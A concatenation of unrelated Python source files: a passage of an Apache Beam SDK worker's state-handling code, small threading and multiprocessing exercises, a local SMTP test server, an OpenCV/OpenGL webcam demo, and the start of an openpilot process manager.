getattr(request, request_type), request.instruction_id)
else:
raise NotImplementedError
def register(self,
request, # type: beam_fn_api_pb2.RegisterRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
"""Registers a set of ``beam_fn_api_pb2.ProcessBundleDescriptor``s.
    This set of ``beam_fn_api_pb2.ProcessBundleDescriptor``s comes as part of a
``beam_fn_api_pb2.RegisterRequest``, which the runner sends to the SDK
worker before starting processing to register stages.
"""
for process_bundle_descriptor in request.process_bundle_descriptor:
self.bundle_processor_cache.register(process_bundle_descriptor)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
def process_bundle(self,
request, # type: beam_fn_api_pb2.ProcessBundleRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
bundle_processor = self.bundle_processor_cache.get(
instruction_id, request.process_bundle_descriptor_id)
try:
with bundle_processor.state_handler.process_instruction_id(
instruction_id, request.cache_tokens):
with self.maybe_profile(instruction_id):
delayed_applications, requests_finalization = (
bundle_processor.process_bundle(instruction_id))
monitoring_infos = bundle_processor.monitoring_infos()
monitoring_infos.extend(self.state_cache_metrics_fn())
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
residual_roots=delayed_applications,
monitoring_infos=monitoring_infos,
monitoring_data={
SHORT_ID_CACHE.getShortId(info): info.payload
for info in monitoring_infos
},
requires_finalization=requests_finalization))
# Don't release here if finalize is needed.
if not requests_finalization:
self.bundle_processor_cache.release(instruction_id)
return response
except: # pylint: disable=broad-except
# Don't re-use bundle processors on failure.
self.bundle_processor_cache.discard(instruction_id)
raise
def process_bundle_split(self,
request, # type: beam_fn_api_pb2.ProcessBundleSplitRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
processor = self.bundle_processor_cache.lookup(request.instruction_id)
if processor:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_split=processor.try_split(request))
else:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
error='Instruction not running: %s' % instruction_id)
def _log_lull_in_bundle_processor(self, processor):
sampler_info = processor.state_sampler.get_info()
self._log_lull_sampler_info(sampler_info)
def _log_lull_sampler_info(self, sampler_info):
if (sampler_info and sampler_info.time_since_transition and
sampler_info.time_since_transition > self.log_lull_timeout_ns):
step_name = sampler_info.state_name.step_name
state_name = sampler_info.state_name.name
lull_seconds = sampler_info.time_since_transition / 1e9
state_lull_log = (
'Operation ongoing for over %.2f seconds in state %s' %
(lull_seconds, state_name))
step_name_log = (' in step %s ' % step_name) if step_name else ''
exec_thread = getattr(sampler_info, 'tracked_thread', None)
if exec_thread is not None:
thread_frame = sys._current_frames().get(exec_thread.ident) # pylint: disable=protected-access
stack_trace = '\n'.join(
traceback.format_stack(thread_frame)) if thread_frame else ''
else:
stack_trace = '-NOT AVAILABLE-'
_LOGGER.warning(
'%s%s without returning. Current Traceback:\n%s',
state_lull_log,
step_name_log,
stack_trace)
if self._should_log_full_thread_dump(lull_seconds):
self._log_full_thread_dump()
def _should_log_full_thread_dump(self, lull_seconds):
if lull_seconds < LOG_LULL_FULL_THREAD_DUMP_LULL_S:
return False
now = time.time()
if (self._last_full_thread_dump_secs + LOG_LULL_FULL_THREAD_DUMP_INTERVAL_S
< now):
self._last_full_thread_dump_secs = now
return True
return False
def _log_full_thread_dump(self):
thread_dump()
def process_bundle_progress(self,
request, # type: beam_fn_api_pb2.ProcessBundleProgressRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
    # Progress for a bundle that is no longer in flight yields an empty
    # response rather than an error.
processor = self.bundle_processor_cache.lookup(request.instruction_id)
if processor:
self._log_lull_in_bundle_processor(processor)
monitoring_infos = processor.monitoring_infos() if processor else []
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_progress=beam_fn_api_pb2.ProcessBundleProgressResponse(
monitoring_infos=monitoring_infos,
monitoring_data={
SHORT_ID_CACHE.getShortId(info): info.payload
for info in monitoring_infos
}))
def process_bundle_progress_metadata_request(self,
request, # type: beam_fn_api_pb2.ProcessBundleProgressMetadataRequest
instruction_id # type: str
):
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_progress=beam_fn_api_pb2.
ProcessBundleProgressMetadataResponse(
monitoring_info=SHORT_ID_CACHE.getInfos(
request.monitoring_info_id)))
def finalize_bundle(self,
request, # type: beam_fn_api_pb2.FinalizeBundleRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
processor = self.bundle_processor_cache.lookup(request.instruction_id)
if processor:
try:
finalize_response = processor.finalize_bundle()
self.bundle_processor_cache.release(request.instruction_id)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id, finalize_bundle=finalize_response)
except:
self.bundle_processor_cache.discard(request.instruction_id)
raise
else:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
error='Instruction not running: %s' % instruction_id)
@contextlib.contextmanager
def maybe_profile(self, instruction_id):
if self.profiler_factory:
profiler = self.profiler_factory(instruction_id)
if profiler:
with profiler:
yield
else:
yield
else:
yield
class StateHandler(with_metaclass(abc.ABCMeta, object)): # type: ignore[misc]
"""An abstract object representing a ``StateHandler``."""
@abc.abstractmethod
def get_raw(self,
state_key, # type: beam_fn_api_pb2.StateKey
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Tuple[bytes, Optional[bytes]]
raise NotImplementedError(type(self))
@abc.abstractmethod
def append_raw(
self,
state_key, # type: beam_fn_api_pb2.StateKey
data # type: bytes
):
# type: (...) -> _Future
raise NotImplementedError(type(self))
@abc.abstractmethod
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
raise NotImplementedError(type(self))
class StateHandlerFactory(with_metaclass(abc.ABCMeta,
object)): # type: ignore[misc]
"""An abstract factory for creating ``DataChannel``."""
@abc.abstractmethod
def create_state_handler(self, api_service_descriptor):
# type: (endpoints_pb2.ApiServiceDescriptor) -> CachingStateHandler
"""Returns a ``StateHandler`` from the given ApiServiceDescriptor."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
# type: () -> None
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcStateHandlerFactory(StateHandlerFactory):
"""A factory for ``GrpcStateHandler``.
Caches the created channels by ``state descriptor url``.
"""
def __init__(self, state_cache, credentials=None):
self._state_handler_cache = {} # type: Dict[str, CachingStateHandler]
self._lock = threading.Lock()
self._throwing_state_handler = ThrowingStateHandler()
self._credentials = credentials
self._state_cache = state_cache
def create_state_handler(self, api_service_descriptor):
# type: (endpoints_pb2.ApiServiceDescriptor) -> CachingStateHandler
if not api_service_descriptor:
return self._throwing_state_handler
url = api_service_descriptor.url
if url not in self._state_handler_cache:
with self._lock:
if url not in self._state_handler_cache:
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size is
# controlled in a layer above.
options = [('grpc.max_receive_message_length', -1),
('grpc.max_send_message_length', -1)]
if self._credentials is None:
_LOGGER.info('Creating insecure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.insecure_channel(
url, options=options)
else:
_LOGGER.info('Creating secure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.secure_channel(
url, self._credentials, options=options)
_LOGGER.info('State channel established.')
# Add workerId to the grpc channel
grpc_channel = grpc.intercept_channel(
grpc_channel, WorkerIdInterceptor())
self._state_handler_cache[url] = CachingStateHandler(
self._state_cache,
GrpcStateHandler(
beam_fn_api_pb2_grpc.BeamFnStateStub(grpc_channel)))
return self._state_handler_cache[url]
def close(self):
# type: () -> None
_LOGGER.info('Closing all cached gRPC state handlers.')
for _, state_handler in self._state_handler_cache.items():
state_handler.done()
self._state_handler_cache.clear()
self._state_cache.evict_all()
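# create_state_handler above uses a double-checked locking idiom: a cheap
# unlocked membership test for the common case, re-checked under the lock
# before the expensive channel creation. A generic sketch of the same idiom
# with hypothetical names, purely for illustration:
def _example_get_or_create(cache, key, factory, lock):
  if key not in cache:  # fast path, no lock taken
    with lock:
      if key not in cache:  # re-check; another thread may have created it
        cache[key] = factory()
  return cache[key]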
class ThrowingStateHandler(StateHandler):
"""A state handler that errors on any requests."""
  def get_raw(self, state_key, continuation_token=None):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'state ApiServiceDescriptor for state key %s.' % state_key)
  def append_raw(self, state_key, data):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'state ApiServiceDescriptor for state key %s.' % state_key)
def clear(self, state_key):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'state ApiServiceDescriptor for state key %s.' % state_key)
class GrpcStateHandler(StateHandler):
_DONE = object()
def __init__(self, state_stub):
# type: (beam_fn_api_pb2_grpc.BeamFnStateStub) -> None
self._lock = threading.Lock()
self._state_stub = state_stub
self._requests = queue.Queue(
) # type: queue.Queue[beam_fn_api_pb2.StateRequest]
self._responses_by_id = {} # type: Dict[str, _Future]
self._last_id = 0
self._exc_info = None
self._context = threading.local()
self.start()
@contextlib.contextmanager
def process_instruction_id(self, bundle_id):
if getattr(self._context, 'process_instruction_id', None) is not None:
raise RuntimeError(
'Already bound to %r' % self._context.process_instruction_id)
self._context.process_instruction_id = bundle_id
try:
yield
finally:
self._context.process_instruction_id = None
def start(self):
self._done = False
def request_iter():
while True:
request = self._requests.get()
if request is self._DONE or self._done:
break
yield request
responses = self._state_stub.State(request_iter())
def pull_responses():
try:
for response in responses:
# Popping an item from a dictionary is atomic in cPython
future = self._responses_by_id.pop(response.id)
future.set(response)
if self._done:
break
except: # pylint: disable=bare-except
self._exc_info = sys.exc_info()
raise
reader = threading.Thread(target=pull_responses, name='read_state')
reader.daemon = True
reader.start()
def done(self):
self._done = True
self._requests.put(self._DONE)
def get_raw(self,
state_key, # type: beam_fn_api_pb2.StateKey
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Tuple[bytes, Optional[bytes]]
response = self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
get=beam_fn_api_pb2.StateGetRequest(
continuation_token=continuation_token)))
return response.get.data, response.get.continuation_token
def append_raw(self,
state_key, # type: Optional[beam_fn_api_pb2.StateKey]
data # type: bytes
):
# type: (...) -> _Future
return self._request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
append=beam_fn_api_pb2.StateAppendRequest(data=data)))
def clear(self, state_key):
# type: (Optional[beam_fn_api_pb2.StateKey]) -> _Future
return self._request(
beam_fn_api_pb2.StateRequest(
state_key=state_key, clear=beam_fn_api_pb2.StateClearRequest()))
def _request(self, request):
# type: (beam_fn_api_pb2.StateRequest) -> _Future
request.id = self._next_id()
request.instruction_id = self._context.process_instruction_id
# Adding a new item to a dictionary is atomic in cPython
self._responses_by_id[request.id] = future = _Future()
# Request queue is thread-safe
self._requests.put(request)
return future
def _blocking_request(self, request):
# type: (beam_fn_api_pb2.StateRequest) -> beam_fn_api_pb2.StateResponse
req_future = self._request(request)
while not req_future.wait(timeout=1):
if self._exc_info:
t, v, tb = self._exc_info
raise_(t, v, tb)
elif self._done:
raise RuntimeError()
response = req_future.get()
if response.error:
raise RuntimeError(response.error)
else:
return response
def _next_id(self):
# type: () -> str
with self._lock:
# Use a lock here because this GrpcStateHandler is shared across all
# requests which have the same process bundle descriptor. State requests
# can concurrently access this section if a Runner uses threads / workers
# (aka "parallelism") to send data to this SdkHarness and its workers.
self._last_id += 1
request_id = self._last_id
return str(request_id)
class CachingStateHandler(object):
""" A State handler which retrieves and caches state.
If caching is activated, caches across bundles using a supplied cache token.
If activated but no cache token is supplied, caching is done at the bundle
level.
"""
def __init__(self,
global_state_cache, # type: StateCache
underlying_state # type: StateHandler
):
self._underlying = underlying_state
self._state_cache = global_state_cache
self._context = threading.local()
@contextlib.contextmanager
def process_instruction_id(self, bundle_id, cache_tokens):
if getattr(self._context, 'user_state_cache_token', None) is not None:
raise RuntimeError(
'Cache tokens already set to %s' %
self._context.user_state_cache_token)
self._context.side_input_cache_tokens = {}
user_state_cache_token = None
for cache_token_struct in cache_tokens:
if cache_token_struct.HasField("user_state"):
# There should only be one user state token present
assert not user_state_cache_token
user_state_cache_token = cache_token_struct.token
elif cache_token_struct.HasField("side_input"):
self._context.side_input_cache_tokens[
cache_token_struct.side_input.transform_id,
cache_token_struct.side_input.
side_input_id] = cache_token_struct.token
# TODO: Consider a two-level cache to avoid extra logic and locking
# for items cached at the bundle level.
self._context.bundle_cache_token = bundle_id
try:
self._state_cache.initialize_metrics()
self._context.user_state_cache_token = user_state_cache_token
with self._underlying.process_instruction_id(bundle_id):
yield
finally:
self._context.side_input_cache_tokens = {}
self._context.user_state_cache_token = None
self._context.bundle_cache_token = None
def blocking_get(self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
):
# type: (...) -> Iterable[Any]
cache_token = self._get_cache_token(state_key)
if not cache_token:
# Cache disabled / no cache token. Can't do a lookup/store in the cache.
# Fall back to lazily materializing the state, one element at a time.
return self._lazy_iterator(state_key, coder)
# Cache lookup
cache_state_key = self._convert_to_cache_key(state_key)
cached_value = self._state_cache.get(cache_state_key, cache_token)
if cached_value is None:
# Cache miss, need to retrieve from the Runner
# Further size estimation or the use of the continuation token on the
# runner side could fall back to materializing one item at a time.
# https://jira.apache.org/jira/browse/BEAM-8297
materialized = cached_value = (
self._partially_cached_iterable(state_key, coder))
if isinstance(materialized, (list, self.ContinuationIterable)):
self._state_cache.put(cache_state_key, cache_token, materialized)
else:
_LOGGER.error(
"Uncacheable type %s for key %s. Not caching.",
materialized,
state_key)
return cached_value
def extend(self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
elements, # type: Iterable[Any]
):
# type: (...) -> _Future
cache_token = self._get_cache_token(state_key)
if cache_token:
# Update the cache
cache_key = self._convert_to_cache_key(state_key)
cached_value = self._state_cache.get(cache_key, cache_token)
# Keep in mind that the state for this key can be evicted
# while executing this function. Either read or write to the cache
# but never do both here!
if cached_value is None:
# We have never cached this key before, first retrieve state
cached_value = self.blocking_get(state_key, coder)
# Just extend the already cached value
if isinstance(cached_value, list):
# Materialize provided iterable to ensure reproducible iterations,
# here and when writing to the state handler below.
elements = list(elements)
# The state is fully cached and can be extended
cached_value.extend(elements)
elif isinstance(cached_value, self.ContinuationIterable):
# The state is too large to be fully cached (continuation token used),
        # only the first part is cached; the rest is enumerated via the runner.
pass
else:
# When a corrupt value made it into the cache, we have to fail.
raise Exception("Unexpected cached value: %s" % cached_value)
# Write to state handler
out = coder_impl.create_OutputStream()
for element in elements:
coder.encode_to_stream(element, out, True)
return self._underlying.append_raw(state_key, out.get())
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
cache_token = self._get_cache_token(state_key)
if cache_token:
cache_key = self._convert_to_cache_key(state_key)
self._state_cache.clear(cache_key, cache_token)
return self._underlying.clear(state_key)
def done(self):
# type: () -> None
self._underlying.done()
def _lazy_iterator(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Iterator[Any]
"""Materializes the state lazily, one element at a time.
    :return A generator that yields the next element each time it is advanced.
"""
while True:
data, continuation_token = (
self._underlying.get_raw(state_key, continuation_token))
input_stream = coder_impl.create_InputStream(data)
while input_stream.size() > 0:
yield coder.decode_from_stream(input_stream, True)
if not continuation_token:
break
def _get_cache_token(self, state_key):
if not self._state_cache.is_cache_enabled():
return None
elif state_key.HasField('bag_user_state'):
if self._context.user_state_cache_token:
return self._context.user_state_cache_token
else:
return self._context.bundle_cache_token
elif state_key.WhichOneof('type').endswith('_side_input'):
side_input = getattr(state_key, state_key.WhichOneof('type'))
return self._context.side_input_cache_tokens.get(
(side_input.transform_id, side_input.side_input_id),
self._context.bundle_cache_token)
def _partially_cached_iterable(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder # type: coder_impl.CoderImpl
):
# type: (...) -> Iterable[Any]
"""Materialized the first page of data, concatenated with a lazy iterable
of the rest, if any.
"""
data, continuation_token = self._underlying.get_raw(state_key, None)
head = []
input_stream = coder_impl.create_InputStream(data)
while input_stream.size() > 0:
head.append(coder.decode_from_stream(input_stream, True))
if not continuation_token:
return head
else:
return self.ContinuationIterable(
head,
functools.partial(
self._lazy_iterator, state_key, coder, continuation_token))
class ContinuationIterable(object):
def __init__(self, head, continue_iterator_fn):
self.head = head
self.continue_iterator_fn = continue_iterator_fn
def __iter__(self):
for item in self.head:
yield item
for item in self.continue_iterator_fn():
yield item
@staticmethod
def _convert_to_cache_key(state_key):
return state_key.SerializeToString()
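# ContinuationIterable above simply chains an already-materialized head with a
# callable that lazily fetches the remainder from the runner. A tiny
# self-contained illustration (the literal values are hypothetical):
def _example_continuation_iterable():
  def tail():
    return iter([3, 4])  # stands in for a _lazy_iterator partial
  chained = CachingStateHandler.ContinuationIterable([1, 2], tail)
  return list(chained)  # -> [1, 2, 3, 4]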
class _Future(object):
"""A simple future object to implement blocking requests.
"""
def __init__(self):
self._event = threading.Event()
def wait(self, timeout=None):
return self._event.wait(timeout)
def get(self, timeout=None):
if self.wait(timeout):
return self._value
else:
raise LookupError()
def set(self, value):
self._value = value
self._event.set()
@classmethod
def done(cls):
# type: () -> _Future
if not hasattr(cls, 'DONE'):
done_future = _Future()
done_future.set(None)
cls.DONE = done_future # type: ignore[attr-defined]
return cls.DONE # type: ignore[attr-defined]
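# _Future above is an Event plus a payload: wait() blocks until another thread
# calls set(value), after which get() returns that value. A small sketch with
# hypothetical timing, for illustration only:
def _example_future_roundtrip():
  fut = _Future()
  threading.Timer(0.01, fut.set, args=('done',)).start()
  fut.wait(timeout=1)  # True once the timer thread has called set()
  return fut.get()  # -> 'done'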
class KeyedDefaultDict(collections.defaultdict):
def __missing__(self, key):
self[key] = self.default_factory(key)
return self[key]
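# Unlike a plain collections.defaultdict, KeyedDefaultDict passes the missing
# key to its factory. A minimal illustration (hypothetical values):
def _example_keyed_default_dict():
  lengths = KeyedDefaultDict(len)
  return lengths['state']  # -> 5, and the value is memoized under 'state'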
|
dining_savages.py
|
from threading import Semaphore, Thread
from itertools import chain
def savage(servings, mutex, pot, empty_pot):
while True:
mutex.acquire()
pot.pot_count -= 1
if pot.pot_count <= 0:
empty_pot.release()
mutex.release()
pot.acquire()
serving = get_serving(servings)
eat(serving)
def cook(servings, mutex, empty_pot, pot):
while True:
empty_pot.acquire()
put_servings(servings, pot.total)
mutex.acquire()
pot.pot_count = pot.total
        for _ in range(pot.pot_count):
pot.release()
mutex.release()
def get_serving(servings):
return servings.pop()
def put_servings(servings, total):
for food in range(total):
servings.append(food)
def eat(serving):
    print('Eating {}'.format(serving))
if __name__ == '__main__':
    num_savages = 10
    pot_count = 5
    mutex = Semaphore(1)
    empty_pot = Semaphore(0)
    pot = Semaphore(0)
    # Track pot capacity and remaining servings as attributes on the semaphore.
    pot.total = pot_count
    pot.pot_count = 0
    servings = []
    savages = [Thread(target=savage, args=(servings, mutex, pot, empty_pot))
               for _ in range(num_savages)]
    cook_thread = Thread(target=cook, args=(servings, mutex, empty_pot, pot))
    for t in chain(savages, [cook_thread]):
        t.start()
    for t in chain(savages, [cook_thread]):
        t.join()
|
smtp_server.py
|
# smtp_server.py
import smtpd
import asyncore
import threading
class CustomSMTPServer(smtpd.SMTPServer):
    def __init__(self, *args, **kwargs):
        smtpd.SMTPServer.__init__(self, *args, **kwargs)
        # keep every received message so SMTPServer.get() below can return them
        self.emails = []
    def process_message(self, peer, mailfrom, rcpttos, data, **kwargs):
        print('Receiving message from:', peer)
        print('Message addressed from:', mailfrom)
        print('Message addressed to:', rcpttos)
        print('Message length:', len(data))
        self.emails.append(data)
        return
class SMTPServer():
def __init__(self):
self.port = 1030
def start(self):
'''Start listening on self.port'''
# create an instance of the SMTP server, derived from asyncore.dispatcher
self.smtp = CustomSMTPServer(('0.0.0.0', self.port), None)
# start the asyncore loop, listening for SMTP connection, within a thread
# timeout parameter is important, otherwise code will block 30 seconds
# after the smtp channel has been closed
kwargs = {'timeout':1, 'use_poll': True}
self.thread = threading.Thread(target=asyncore.loop, kwargs=kwargs)
self.thread.start()
def stop(self):
'''Stop listening to self.port'''
# close the SMTPserver to ensure no channels connect to asyncore
self.smtp.close()
# now it is safe to wait for asyncore.loop() to exit
self.thread.join()
# check for emails in a non-blocking way
def get(self):
'''Return all emails received so far'''
return self.smtp.emails
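    # A rough sketch of how this server could be exercised from a client once
    # start() has been called; the addresses are hypothetical and this helper
    # is not called anywhere in this module.
    def example_send_test_mail(self):
        import smtplib
        with smtplib.SMTP('localhost', self.port) as smtp:
            smtp.sendmail(
                'sender@example.com', ['recipient@example.com'],
                'Subject: test\r\n\r\nhello from smtplib')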
if __name__ == '__main__':
# server = CustomSMTPServer(('0.0.0.0', 1030), None)
# asyncore.loop()
server = SMTPServer()
server.start()
|
h4.py
|
'''
Two processes run concurrently: process 1 writes "hello" to a file 10 times,
and process 2 writes "world" to the same file 10 times.
How can we guarantee the file always ends up as
"hellohellohellohellohello.....worldworldworld......."?
'''
from multiprocessing import Process, Lock, Event
def new1write(name, mylock, hello_done):
    with mylock:
        f = open(name, 'r+')
        f.write('hello' * 10)
        f.close()
    # signal that the "hello" block is on disk
    hello_done.set()
def new2write(name, mylock, hello_done):
    # wait for process 1, so "world" is always appended after "hello"
    hello_done.wait()
    with mylock:
        f = open(name, 'r+')
        c = f.read()
        f.seek(0, 0)
        f.write(c + 'world' * 10)
        f.close()
if __name__ == '__main__':
    f = open('./my.txt', 'w')
    f.close()
    mylock = Lock()
    hello_done = Event()
    p1 = Process(target=new1write, args=('./my.txt', mylock, hello_done))
    p2 = Process(target=new2write, args=('./my.txt', mylock, hello_done))
    p1.start()
    p2.start()
    p1.join()
    p2.join()
|
01- opencv-opengl.py
|
#coding:utf-8
'''
Using OpenCV together with OpenGL: webcam frames are uploaded as an OpenGL
texture and rendered behind a rotating cube.
'''
import numpy as np
import cv2
from PIL import Image
import sys
from OpenGL.GL import *
from OpenGL.GLUT import *
from OpenGL.GLU import *
from threading import Thread
texture_id = 0
threadQuit = 0
X_AXIS = 0.0
Y_AXIS = 0.0
Z_AXIS = 0.0
DIRECTION = 1
cap = cv2.VideoCapture(0)
newframe = cap.read()[1]
#fps = cap.get(cv2.cv.CV_CAP_PROP_FPS)
def Init():
VideoThread = Thread(target=update, args=())
VideoThread.start()
#VideoThread.join()
def InitGL(Width, Height):
global texture_id
glClearColor(1.0, 1.0, 1.0, 1.0)
glClearDepth(1.0)
glDepthFunc(GL_LESS)
glEnable(GL_DEPTH_TEST)
glShadeModel(GL_SMOOTH)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(45.0, float(Width)/float(Height), 0.1, 100.0)
glMatrixMode(GL_MODELVIEW)
glEnable(GL_TEXTURE_2D)
texture_id = glGenTextures(1)
def update():
global newframe
while(True):
newframe = cap.read()[1]
newframe = cv2.cvtColor(newframe,cv2.COLOR_BGR2RGB)
if threadQuit == 1:
break
cap.release()
cv2.destroyAllWindows()
def DrawGLScene():
global cap
global newframe
global X_AXIS,Y_AXIS,Z_AXIS
global DIRECTION
global texture_id
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glLoadIdentity()
frame = newframe
# convert image to OpenGL texture format
tx_image = cv2.flip(frame, 0)
tx_image = Image.fromarray(tx_image)
ix = tx_image.size[0]
iy = tx_image.size[1]
tx_image = tx_image.tobytes('raw', 'RGBX', 0, -1)
# create texture
glBindTexture(GL_TEXTURE_2D, texture_id)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, ix, iy, 0, GL_RGBA, GL_UNSIGNED_BYTE, tx_image)
glBindTexture(GL_TEXTURE_2D, texture_id)
glPushMatrix()
glTranslatef(0.0,0.0,-6.0)
glBegin(GL_QUADS)
glTexCoord2f(0.0, 1.0); glVertex3f(-4.0, -3.0, 0.0)
glTexCoord2f(1.0, 1.0); glVertex3f( 4.0, -3.0, 0.0)
glTexCoord2f(1.0, 0.0); glVertex3f( 4.0, 3.0, 0.0)
glTexCoord2f(0.0, 0.0); glVertex3f(-4.0, 3.0, 0.0)
glEnd()
glPopMatrix()
glPushMatrix()
glTranslatef(0.0,0.0,-6.0)
glRotatef(X_AXIS,1.0,0.0,0.0)
glRotatef(Y_AXIS,0.0,1.0,0.0)
glRotatef(Z_AXIS,0.0,0.0,1.0)
# Draw Cube (multiple quads)
glBegin(GL_QUADS)
glColor3f(0.0,1.0,0.0)
glVertex3f( 1.0, 1.0,-1.0)
glVertex3f(-1.0, 1.0,-1.0)
glVertex3f(-1.0, 1.0, 1.0)
glVertex3f( 1.0, 1.0, 1.0)
glColor3f(1.0,0.0,0.0)
glVertex3f( 1.0,-1.0, 1.0)
glVertex3f(-1.0,-1.0, 1.0)
glVertex3f(-1.0,-1.0,-1.0)
glVertex3f( 1.0,-1.0,-1.0)
glColor3f(0.0,1.0,1.0)
glVertex3f( 1.0, 1.0, 1.0)
glVertex3f(-1.0, 1.0, 1.0)
glVertex3f(-1.0,-1.0, 1.0)
glVertex3f( 1.0,-1.0, 1.0)
glColor3f(1.0,1.0,0.0)
glVertex3f( 1.0,-1.0,-1.0)
glVertex3f(-1.0,-1.0,-1.0)
glVertex3f(-1.0, 1.0,-1.0)
glVertex3f( 1.0, 1.0,-1.0)
glColor3f(0.0,0.0,1.0)
glVertex3f(-1.0, 1.0, 1.0)
glVertex3f(-1.0, 1.0,-1.0)
glVertex3f(-1.0,-1.0,-1.0)
glVertex3f(-1.0,-1.0, 1.0)
glColor3f(1.0,0.0,1.0)
glVertex3f( 1.0, 1.0,-1.0)
glVertex3f( 1.0, 1.0, 1.0)
glVertex3f( 1.0,-1.0, 1.0)
glVertex3f( 1.0,-1.0,-1.0)
glEnd()
glPopMatrix()
X_AXIS = X_AXIS - 0.30
Z_AXIS = Z_AXIS - 0.30
glutSwapBuffers()
def keyPressed(key, x, y):
global threadQuit
    # GLUT may deliver the key as bytes (Python 3) or str
    if key in (b'\x1b', b'q', chr(27), "q"):
threadQuit = 1
sys.exit()
def main():
glutInit(sys.argv)
glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_DEPTH)
glutInitWindowSize(640,480)
glutInitWindowPosition(200,200)
window = glutCreateWindow(b'My and Cube')
glutDisplayFunc(DrawGLScene)
glutIdleFunc(DrawGLScene)
glutKeyboardFunc(keyPressed)
InitGL(640, 480)
glutMainLoop()
Init()
main()
|
manager.py
|
#!/usr/bin/env python2.7
import os
import sys
import fcntl
import errno
import signal
import subprocess
from common.basedir import BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat)
except (OSError, IOError):
pass
os._exit(os.wait()[1])
if __name__ == "__main__":
is_neos = os.path.isfile("/init.qcom.rc")
neos_update_required = False
if is_neos:
version = int(open("/VERSION").read()) if os.path.isfile("/VERSION") else 0
revision = int(open("/REVISION").read()) if version >= 10 else 0 # Revision only present in NEOS 10 and up
neos_update_required = version < 10 or (version == 10 and revision != 3)
if neos_update_required:
# update continue.sh before updating NEOS
if os.path.isfile(os.path.join(BASEDIR, "scripts", "continue.sh")):
from shutil import copyfile
copyfile(os.path.join(BASEDIR, "scripts", "continue.sh"), "/data/data/com.termux/files/continue.sh")
# run the updater
print("Starting NEOS updater")
subprocess.check_call(["git", "clean", "-xdf"], cwd=BASEDIR)
updater_dir = os.path.join(BASEDIR, "installer", "updater")
manifest_path = os.path.realpath(os.path.join(updater_dir, "update.json"))
os.system(os.path.join(updater_dir, "updater") + " file://" + manifest_path)
raise Exception("NEOS outdated")
elif os.path.isdir("/data/neoupdate"):
from shutil import rmtree
rmtree("/data/neoupdate")
unblock_stdout()
import glob
import shutil
import hashlib
import importlib
import subprocess
import traceback
from multiprocessing import Process
from setproctitle import setproctitle #pylint: disable=no-name-in-module
from common.params import Params
import cereal
ThermalStatus = cereal.log.ThermalData.ThermalStatus
from selfdrive.services import service_list
from selfdrive.swaglog import cloudlog
import selfdrive.messaging as messaging
from selfdrive.registration import register
from selfdrive.version import version, dirty
import selfdrive.crash as crash
from selfdrive.loggerd.config import ROOT
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
